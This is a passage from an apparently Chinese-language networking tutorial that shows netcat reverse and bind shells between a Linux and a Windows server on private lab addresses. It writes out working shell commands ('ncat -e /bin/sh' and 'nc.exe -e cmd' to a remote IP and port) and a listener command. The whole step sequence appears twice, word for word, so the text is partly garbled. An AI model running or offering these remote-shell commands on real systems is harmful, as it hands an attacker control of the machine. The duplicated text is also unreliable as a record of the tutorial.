2、Linux服务器主动连接windows服务器ip和端口
ncat -e /bin/sh 192.168.1.106 8866
3、windows服务器上执行ifconfig命令,成功获取Linux服务器相关信息
四、反向连接,Linux服务器控制服务器windows
1、Linux服务器开启端口监听
ncat -lvvp 8899
2、windows服务器主动连接Linux服务器
nc.exe -e cmd 192.168.1.108 8899
2、Linux服务器主动连接windows服务器ip和端口
ncat -e /bin/sh 192.168.1.106 8866
3、windows服务器上执行ifconfig命令,成功获取Linux服务器相关信息
四、反向连接,Linux服务器控制服务器windows
1、Linux服务器开启端口监听
ncat -lvvp 8899
2、windows服务器主动连接Linux服务器
nc.exe -e cmd 192.168.1.108 8899
Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.